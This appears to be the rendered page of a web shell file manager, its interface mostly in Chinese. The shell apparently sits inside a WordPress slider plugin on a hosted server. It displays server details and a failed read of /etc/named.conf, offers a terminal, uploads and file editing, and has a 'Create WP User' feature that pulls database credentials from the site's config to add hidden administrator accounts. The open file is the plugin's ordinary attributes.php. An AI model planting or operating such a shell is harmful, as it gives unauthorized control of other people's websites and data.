Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat_30102025
/
wp-content
/
plugins
/
gutenslider
/
src
/
blocks
/
gutenslide
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
block_free
[目录]
drwxr-xr-x
2025-10-30 08:16
free
[目录]
drwxr-xr-x
2025-04-10 14:21
attributes.php
1.73 KB
-rw-r--r--
2025-04-10 14:21
block-front.php
14.77 KB
-rw-r--r--
2025-04-10 14:21
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
attributes.php
<?php $gutenslide_attributes = array( 'gsBlockId' => array( 'type' => 'string', ), 'background' => array( 'type' => 'object', 'default' => array(), ), 'isEditable' => array( 'type' => 'boolean', 'default' => true, ), 'mediaUrl' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => '.slide-bg img, .slide-bg video', 'attribute' => 'src', ), 'mediaAlt' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => '.slide-bg img', 'attribute' => 'alt', 'default' => '', ), 'mediaType' => array( 'type' => 'string', ), 'mediaId' => array( 'type' => 'number', ), 'overlayColor' => array( 'type' => 'string', 'default' => '', ), 'dimRatio' => array( 'type' => 'number', 'default' => 0.5, ), 'rgbaBackground' => array( 'type' => 'string', 'default' => '', ), 'initialized' => array( 'type' => 'boolean', 'default' => false, ), 'linkUrl' => array( 'type' => 'string', 'default' => '', ), 'verticalAlign' => array( 'type' => 'string', 'default' => 'center', ), 'contentPosition' => array( 'type' => 'string', 'default' => 'center', ), 'autoCaption' => array( 'type' => 'string', 'default' => 'none', ), 'minWidth' => array( 'type' => 'string', 'default' => '80%', ), 'mixBlendMode' => array( 'type' => 'string', 'default' => 'none', ), 'opensInNewTab' => array( 'type' => 'boolean', 'default' => false, ), 'hashId' => array( 'type' => 'string', 'default' => '', ), 'isHidden' => array( 'type' => 'boolean', 'default' => false, ), 'fetchPriority' => array( 'type' => 'boolean', 'default' => false, ) );
关闭
保存